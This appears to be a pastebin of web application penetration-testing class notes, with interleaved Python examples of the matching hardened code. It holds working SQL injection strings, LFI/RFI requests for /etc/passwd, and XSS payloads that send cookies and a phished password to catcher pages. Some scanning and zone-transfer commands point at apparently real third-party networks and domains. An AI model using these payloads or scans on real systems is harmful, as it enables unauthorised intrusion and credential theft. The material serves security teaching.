joemccray

Norway AppSec 2017

Sep 25th, 2017
#######################
# Norway AppSec Class #
#######################


#################
# Passive Recon #
#################

- Wikipedia Page
- Are they Public or Private?
- Does the target have any subsidiaries?

- Robtex
- Show system map

- Netcraft
- http://toolbar.netcraft.com/site_report

- Passive Recon (Firefox Add-on)

- Example OSINT Report to review:
https://s3.amazonaws.com/infosecaddictsfiles/OSINT_Innophos_11242010.doc



##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you to reference the OWASP Testing Guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment and for defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

1. Does the website talk to a DB?
- Look for parameter passing (ex: site.com/page.php?id=4)
- If yes - try SQL Injection

2. Can I or someone else see what I type?
- If yes - try XSS

3. Does the page reference a file?
- If yes - try LFI/RFI

Let's start with some manual testing against 45.63.104.73

  53.  
#######################
# Attacking PHP/MySQL #
#######################

Go to the LAMP target homepage:
http://45.63.104.73/


Clicking on the Acer link:
http://45.63.104.73/acre2.php?lap=acer

- Found parameter passing (answer yes to question 1)
- Insert ' to test for SQLI

http://45.63.104.73/acre2.php?lap=acer'


Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1


In order to perform union-based SQL injection, we must first determine the number of columns in this query.
We do this using ORDER BY:
http://45.63.104.73/acre2.php?lap=acer' order by 100-- +

Page returns the following error:
Unknown column '100' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 50-- +

Page returns the following error:
Unknown column '50' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 25-- +

Page returns the following error:
Unknown column '25' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 12-- +

Page returns the following error:
Unknown column '12' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
--- Valid page returned for 5 and 6... error on 7, so we know there are 6 columns


Now we build out the UNION ALL SELECT statement with the correct number of columns.

Reference:
http://www.techonthenet.com/sql/union.php


http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +


Now we negate the parameter value 'acer' by turning it into the word 'null':
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j

We see that a 4 and a 5 are on the screen. These are the columns that will echo back data.


Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet


http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +


http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a



########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to the SQL injection attack string.

Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments

Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.


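To see the column-count step and the hardened alternative side by side, here is an added Python example (not the class's acre2.php, which is not on this page) that reproduces the acre2.php pattern against a constructed in-memory SQLite table with six columns. SQLite is used so it runs offline; unlike MySQL it accepts "--" with nothing after it, which is why the "-- +" / "-- j" detail discussed above is MySQL-specific.

```python
import sqlite3

# Constructed stand-in for the laptop table behind acre2.php: six columns,
# so ORDER BY 6 succeeds and ORDER BY 7 fails exactly as in the walkthrough.
ROWS = [
    (1, "acer", "Aspire 5", 499.0, 12, 4.1),
    (2, "dell", "XPS 13", 1199.0, 3, 4.6),
]


def make_db():
    """Create the in-memory SQLite database used by both lookups."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE laptops (id INTEGER, brand TEXT, model TEXT,"
        " price REAL, stock INTEGER, rating REAL)"
    )
    conn.executemany("INSERT INTO laptops VALUES (?, ?, ?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, lap):
    """acre2.php-style: the 'lap' parameter is pasted straight into the SQL."""
    sql = "SELECT * FROM laptops WHERE brand = '%s'" % lap
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, lap):
    """Same query with a bound parameter: the value can never become SQL."""
    return conn.execute("SELECT * FROM laptops WHERE brand = ?", (lap,)).fetchall()


def probe(conn, lookup, lap):
    """Run one lookup and report either ('ok', rows) or ('error', db message)."""
    try:
        return "ok", lookup(conn, lap)
    except sqlite3.Error as exc:
        return "error", str(exc)


# The same attack strings walked through above, with the "-- j" terminator.
PAYLOADS = {
    "quote": "acer'",
    "order_by_7": "acer' ORDER BY 7-- j",
    "order_by_6": "acer' ORDER BY 6-- j",
    "union_5_cols": "null' UNION ALL SELECT 1,2,3,4,5-- j",
    "union_6_cols": "null' UNION ALL SELECT 1,2,3,sqlite_version(),5,6-- j",
}


def run_demo():
    """Return {payload name: (vulnerable result, hardened result)}."""
    conn = make_db()
    return {
        name: (probe(conn, lookup_vulnerable, lap), probe(conn, lookup_hardened, lap))
        for name, lap in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, (vuln, hard) in run_demo().items():
        print("%-13s vulnerable=%s" % (name, vuln))
        print("%-13s hardened  =%s" % ("", hard))
```

With the bound parameter every payload simply matches no brand, so the ORDER BY probing has nothing to measure and the UNION row never appears in column 4.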
#########################
# File Handling Attacks #
#########################

Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file):
http://45.63.104.73/showfile.php?filename=about.txt


See if you can read files on the file system:
http://45.63.104.73/showfile.php?filename=/etc/passwd

We call this attack a Local File Include or LFI.

Now let's find some text out on the internet somewhere:
https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt


Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt


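The showfile.php handler above opens whatever arrives in "filename". As an added Python example (not the lab's PHP), here is the checking a safe file-display page needs: a constructed document root, rejection of anything carrying a URL scheme (the RFI case), a realpath containment check (the LFI case) and an extension allowlist. The root directory and file names are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Only plain display files may be served from the document root.
ALLOWED_EXTENSIONS = {".txt"}


class FileRequestRejected(ValueError):
    """Raised when a request would be remote, leave the root, or is not allowed."""

    def __init__(self, reason, filename):
        super().__init__("%s: %r" % (reason, filename))
        self.reason = reason


def resolve_safe_path(doc_root, filename):
    """Return the absolute path for 'filename' or raise FileRequestRejected.

    Mirrors the two findings above: /etc/passwd (LFI) and an https:// URL (RFI)
    are both refused before anything is opened.
    """
    # RFI: anything with a scheme (https://, ftp://, ...) is not a local file.
    if urlsplit(filename).scheme:
        raise FileRequestRejected("remote", filename)
    root = os.path.realpath(doc_root)
    # os.path.join discards 'root' when filename is absolute, so /etc/passwd
    # resolves to /etc/passwd and fails the containment check; ../ sequences
    # collapse under realpath and fail it the same way.
    target = os.path.realpath(os.path.join(root, filename))
    try:
        inside = os.path.commonpath([root, target]) == root
    except ValueError:  # different drives on Windows: certainly not inside
        inside = False
    if not inside:
        raise FileRequestRejected("escape", filename)
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXTENSIONS:
        raise FileRequestRejected("extension", filename)
    return target


def show_file(doc_root, filename):
    """Safe counterpart of the showfile.php behaviour: read only vetted paths."""
    with open(resolve_safe_path(doc_root, filename), "r", encoding="utf-8") as fh:
        return fh.read()


def make_demo_root():
    """Constructed document root containing only about.txt, for offline runs."""
    root = tempfile.mkdtemp(prefix="showfile-demo-")
    with open(os.path.join(root, "about.txt"), "w", encoding="utf-8") as fh:
        fh.write("About this site\n")
    return root


def classify(doc_root, filename):
    """Return 'served' or the rejection reason ('remote', 'escape', 'extension')."""
    try:
        show_file(doc_root, filename)
        return "served"
    except FileRequestRejected as exc:
        return exc.reason


if __name__ == "__main__":
    root = make_demo_root()
    for name in ("about.txt", "/etc/passwd", "../../../etc/passwd", "about.php",
                 "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/"
                 "master/test/fixtures/hello.txt"):
        print("%-9s %s" % (classify(root, name), name))
```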
###############################################################################
# What is XSS #
# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
###############################################################################

OK - what is Cross Site Scripting (XSS)?

1. Use Firefox to browse to the following location:

http://45.63.104.73/xss_practice/

A really simple search page that is vulnerable should come up.


2. In the search box type:

<script>alert('So this is XSS')</script>


This should pop up an alert window with your message in it, proving XSS is in fact possible.
OK, click OK and then click back and go back to http://45.63.104.73/xss_practice/


3. In the search box type:

<script>alert(document.cookie)</script>


This should pop up an alert window with your cookie in it, proving XSS is in fact possible and your cookie can be accessed.
OK, click OK and then click back and go back to http://45.63.104.73/xss_practice/

4. Now replace that alert script with:

<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>


This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.


5. Now view the stolen cookie at:
http://45.63.104.73/xss_practice/cookie_stealer_logs.html


The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.



############################
# A Better Way To Demo XSS #
############################

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.


Use Firefox to browse to the following location:

http://45.63.104.73/xss_practice/


Paste this in the search box
----------------------------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>


Now view the stolen passwords at:
http://45.63.104.73/xss_practice/passwords.html


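Both demos above work because xss_practice echoes the search term into the page unescaped. As an added Python example (not the lab's PHP), here is that page in its vulnerable and hardened forms, plus the session cookie attributes that keep document.cookie out of reach; the PHPSESSID name and the page template are constructed. Note what HttpOnly does and does not fix: it defeats the cookie_catcher payload but not the prompt() password grab, which only output encoding stops.

```python
import html

# The payloads from the walkthrough above, used here as constructed inputs.
PAYLOADS = {
    "alert": "<script>alert('So this is XSS')</script>",
    "cookie_catcher": '<script>document.location="http://45.63.104.73/xss_practice/'
                      'cookie_catcher.php?c="+document.cookie</script>',
    "password_prompt": r"""<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>""",
}

# Constructed search page: the term lands in an attribute and in body text.
SEARCH_TEMPLATE = ('<html><body><form><input name="q" value="%s"></form>'
                   '<p>You searched for: %s</p></body></html>')


def render_vulnerable(query):
    """xss_practice-style: the search term goes back into the HTML untouched."""
    return SEARCH_TEMPLATE % (query, query)


def render_hardened(query):
    """Escape on output: <, >, &, and both quote styles become entities."""
    safe = html.escape(query, quote=True)
    return SEARCH_TEMPLATE % (safe, safe)


def script_executes(page):
    """Crude check used for the demo: a literal <script> tag survived into markup."""
    return "<script>" in page.lower()


def session_cookie(session_id):
    """Set-Cookie value: HttpOnly hides it from document.cookie, Secure keeps it
    off plaintext HTTP, SameSite=Lax limits cross-site sends."""
    return "PHPSESSID=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % session_id


def cookie_readable_by_script(set_cookie_value):
    """True when a reflected script could read this cookie via document.cookie."""
    attrs = [part.strip().lower() for part in set_cookie_value.split(";")]
    return "httponly" not in attrs


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print("%-16s vulnerable executes=%s hardened executes=%s" % (
            name, script_executes(render_vulnerable(payload)),
            script_executes(render_hardened(payload))))
    print("session cookie readable by script:",
          cookie_readable_by_script(session_cookie("abc123")))
```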
#########################
# Setting up Burp Suite #
#########################
Download the latest free version of FoxyProxy at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

Download the latest free version of Burp at https://portswigger.net/burp/freedownload

Be sure to download the appropriate version for your computer system/OS.

Make sure that burpsuite_free_v1.7.27.jar is set as executable (chmod +x burpsuite_free_v1.7.27.jar) and then run:

java -jar burpsuite_free_v1.7.27.jar

- Click the "Proxy" tab
- Click the "Options" sub tab
- Click "Edit" in the "Proxy Listeners" section
- In the "Edit proxy listener" pop up select the "Binding" tab and select "loopback only"
- In the same pop up make sure that the bind port is 8080
- In the same pop up select the "Certificate" tab
- Ensure that Burp is configured to "generate CA-signed per-host certificates"

Open Firefox
- Click "Edit"
- Click "Preferences"
- Click the "Advanced" tab
- Click the "Network" sub tab
- Click the connection "Settings" button
- Click "Manual proxy configuration"
- Set it to 127.0.0.1 port 8080
- Check "Use this proxy server for all protocols"
- Remove the "localhost, 127.0.0.1" text from the "No Proxy For:" line


Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.

Visit any SSL-protected URL.

On the "This Connection is Untrusted" screen, click on "Add Exception"
Click "Get Certificate", then click "View".

In the "Details" tab, select the root certificate in the tree (PortSwigger CA).

Click "Export" and save the certificate as "BurpCert" on the Desktop.

Close the Certificate Viewer dialog and click "Cancel" on the "Add Security Exception" dialog
Go to Edit | Preferences
Click "Advanced" and go to the "Certificates" tab
Click "View Certificates"

Click "Import" and select the certificate file that you previously saved.

On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".

Close all dialogs and restart Firefox



###############################################################
# Question 1: What is the process that you use when you test? #
###############################################################

Step 1: Automated Testing

Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated vulnerability scans against the target with admin privileges

The web application vulnerability scanners that I use for this process are HP WebInspect and Acunetix.

A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html


Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.

When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not, you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.


Be sure to look for scans that take more than 3 or 4 hours, as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.


Also, be sure to save the scan results and logs. I usually provide this data to the customer.



Step 1b: Directory Brute Forcer
-------------------------------
I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).



Step 2: Manual Testing

Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).

Step 2a: Spider/Scan the entire site with Burp Suite
Save the spider and scan results. I usually provide this data to the customer as well.


Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes, be sure to look at that individual web request in the Target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.

Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.

Here is what I mean:
http://www.site.com/page.aspx?parametername=parametervalue

When you are looking at an individual request, Burp Suite will often insert the payload in place of the parameter value like this:

http://www.site.com/page.aspx?parametername=[ payload ]

You need to ensure that you send the payload this way, and also like this:

http://www.site.com/page.aspx?parametername=parametervalue[ payload ]

This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.



###########################################
# Question 2: How much fuzzing is enough? #
###########################################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.


Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter).

Step 3: When you load your fuzz strings, use the following decision tree:

- Are the fuzz strings causing a default error message (example 404)?
- If this is the case then it is most likely NOT vulnerable

- Are the fuzz strings causing a WAF or LB custom error message?
- If this is the case then you need to find an encoding method to bypass


- Are the fuzz strings causing an error message that discloses the backend type?
- If yes, then identify the DB type and find the correct syntax to successfully exploit
- Some example strings that I use are:
'
"
() <----- Take the parameter value and put it in parentheses
(5-1) <----- See if you can perform an arithmetic function


- Are the fuzz strings rendering executable code?
- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
- Some example strings that I use are:
<b>hello</b>
<u>hello</u>
<script>alert(123);</script>
<script>alert(xss);</script>
<script>alert('xss');</script>
<script>alert("xss");</script>



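The decision tree above, as an added Python example (not the class's own tooling): a triage function that sorts one fuzzed response into the same buckets, run over a few constructed responses that include the MySQL error text from the acre2.php walkthrough. The WAF block-page phrases and DB error signatures are a small constructed set, not a complete list.

```python
import re

# Backend-disclosing error fragments; the MySQL ones are the strings seen above.
DB_ERROR_SIGNATURES = [
    ("mysql", re.compile(r"You have an error in your SQL syntax|"
                         r"Unknown column '.*?' in 'order clause'")),
    ("mssql", re.compile(r"Unclosed quotation mark after the character string|"
                         r"Microsoft OLE DB Provider")),
    ("oracle", re.compile(r"\bORA-\d{5}\b")),
    ("postgresql", re.compile(r"PostgreSQL.*ERROR|pg_query\(\)")),
]

# Phrases typical of WAF / load-balancer block pages (constructed sample set).
WAF_MARKERS = ("request blocked", "web application firewall", "support id", "access denied")

# The rendering probes from the list above: if one comes back verbatim,
# the page emitted it as live markup rather than escaping it.
RENDER_PROBES = ("<b>hello</b>", "<u>hello</u>", "<script>alert(123);</script>",
                 "<script>alert('xss');</script>", '<script>alert("xss");</script>')


def triage(status, body, payload):
    """Classify one response to one fuzz string as (bucket, detail).

    Buckets, in the order of the decision tree:
      waf_block     - custom block page: the input is being filtered
      db_error      - backend error leaked; detail names the DB type
      rendered      - the payload came back as live markup
      default_error - generic 404/500 page: most likely NOT vulnerable
      no_signal     - nothing conclusive for this string (e.g. the (5-1)
                      probe needs comparing against the response for '4')
    """
    lowered = body.lower()
    if any(marker in lowered for marker in WAF_MARKERS):
        return "waf_block", None
    for db_type, pattern in DB_ERROR_SIGNATURES:
        if pattern.search(body):
            return "db_error", db_type
    if payload in RENDER_PROBES and payload in body:
        return "rendered", payload
    if status in (404, 500) and payload not in body:
        return "default_error", status
    return "no_signal", None


# Constructed (status, body, payload) triples standing in for Intruder results.
SAMPLE_RESPONSES = [
    (500, "You have an error in your SQL syntax; check the manual that corresponds "
          "to your MySQL server version for the right syntax to use near ''acer''' "
          "at line 1", "'"),
    (200, "<html>Unknown column '7' in 'order clause'</html>", "' order by 7-- +"),
    (404, "<html><h1>Not Found</h1><p>The requested URL was not found.</p></html>", "'"),
    (403, "<html>Request blocked. Support ID: 0000000000</html>", '"'),
    (200, "<html>Results for <b>hello</b></html>", "<b>hello</b>"),
    (200, "<html>Results for &lt;b&gt;hello&lt;/b&gt;</html>", "<b>hello</b>"),
    (200, "<html>Results for (5-1)</html>", "(5-1)"),
]


def triage_all(responses=SAMPLE_RESPONSES):
    """Triage every sample and return the list of (bucket, detail) results."""
    return [triage(status, body, payload) for status, body, payload in responses]


if __name__ == "__main__":
    for (_, _, payload), result in zip(SAMPLE_RESPONSES, triage_all()):
        print("%-22r -> %s" % (payload, result))
```

The sixth sample shows the escaped form &lt;b&gt; coming back, which is the "not rendered" outcome the tree leaves in no_signal.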
-------------------------------------------------------------------------------------------
OWASP Top 10 Video Explanations

Burp Suite Reference:
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten

A1: Injection Vulnerabilities
https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A2: Broken Authentication and Session Management
https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2

A3: Cross Site Scripting (XSS)
https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4

A4: Insecure Direct Object Reference
https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5

A5: Security Misconfiguration
https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A6: Sensitive Data Exposure
https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8

A7: Missing Function Level Access Control and A8: Cross-Site Request Forgery (CSRF)
https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A9: Using Components w/ Known Vulnerabilities & A10: Unvalidated Redirects and Forwards
https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10



************************ Class Homework ************************

In order to collaborate with the other students on your homework you must sign up with your Gmail account using the following Google form:
https://goo.gl/forms/Ou5yi0VhbLJZBufg2

Filling out this form will give you access to the Google Drive folder where the class homework is contained.


Day 1 Homework:
---------------
Here is a good reference for how to install and configure Burp Suite:
https://nvisium.com/blog/2014/01/10/setting-up-burpsuite-with-firefox-and/


Create a step by step walk-through that details how to install and configure Burp Suite in Windows, and in Linux.
Team 1: Windows
Team 2: Linux



Day 2 Homework:
---------------
Here is a good reference for how to use Burp to look for OWASP Top 10 vulnerabilities:
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten


Use Burp Suite to demonstrate, with screenshots and explanations, how to test for all of the OWASP Top 10 vulnerabilities against the following targets:
Team 1: http://45.63.104.73/
Team 2: http://54.245.184.121/



---------------------------------------------------------------------------------------------------------



#########
# Day 3 #
#########

yum -y update

yum -y groupinstall 'Development Tools'

yum -y install nmap bind-utils vim


cd ~

mkdir toolz

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

chmod 777 propecia

cp propecia /bin

cd ~/toolz/

./ipcrawl 148.87.1.1 148.87.1.254

nmap -sL 148.87.1.0-255

nmap -sL 148.87.1.0-255 | grep oracle

dig axfr heartinternet.co.uk @ns.heartinternet.co.uk



#################################################
# Screenshotting the Web Servers in the Network #
#################################################
cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/


wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
cd wkhtmltox/bin/
cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386


cd ~/toolz/
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/

cp http-screenshot.nse /usr/share/nmap/scripts/


nmap --script-updatedb

cd ~/toolz/
propecia 10.250.100 80 >> temp
strings temp >> labnet-ip-list.txt

cd ~/toolz/labscreenshots/
nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.250.100.0/24 -iL /root/toolz/labnet-ip-list.txt



-----------------------------------------
vi screenshots.sh

#!/bin/bash
# Build one HTML page that shows every http-screenshot PNG in this directory.
# The NSE script names its files screenshot-nmap-<ip>:<port>.png, so awk splits
# each name on the colon and re-encodes it as %3A in the IMG SRC so the browser
# can fetch the file.
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
-----------------------------------------


sh screenshots.sh


python -m SimpleHTTPServer


--- Now browse to the IP of your Linux machine on port 8000 (for example http://10.250.100.157:8000/labnet-port-80-screenshots.html):
http://CentOS-VM-IP:8000/labnet-port-80-screenshots.html

##########################
# Nmap NSE tricks to try #
##########################
nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.250.100.0/24

/sbin/iptables -F
nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.250.100.0/24


nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.250.100.0/24


nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.250.100.0/24


nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.250.100.0/24


nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.250.100.0/24



#####################################
# Writing Your Own Nmap NSE Scripts #
#####################################


----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
-- The Rule Section --
portrule = function(host, port)
    return port.protocol == "tcp"
        and port.number == 80
        and port.state == "open"
end

-- The Action Section --
action = function(host, port)
    return "Norway rocks!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443



----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)
    return "Norway rocks!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443



OK, now let's have some fun with my buddy Carlos Perez's website, which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.

----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        return response.body
    end
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")

        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*


- If -sP yields no results try:
sudo nmap -sL 157.166.226.*

- Look for hostnames:
sudo nmap -sL 157.166.226.* | grep com


- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247


- Bannergrab/Version Query
What versions of software are running
-------------------------------------
sudo nmap -sV 162.243.126.247


- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

https://s3.amazonaws.com/infosecaddictsfiles/nc-password-is-netcat.zip
- The password for the file is 'netcat'

- Extract this zip file to your Desktop

Open a command prompt
=====================

Browse to the folder C:\Users\Student\Desktop\ExploitLab\1-Software-To-Install and install both Python and Nmap


- Go to folder C:\Users\Student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:
ncat localhost 9999

- In the new command prompt window where you ran ncat type:
HELP

- Go to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts
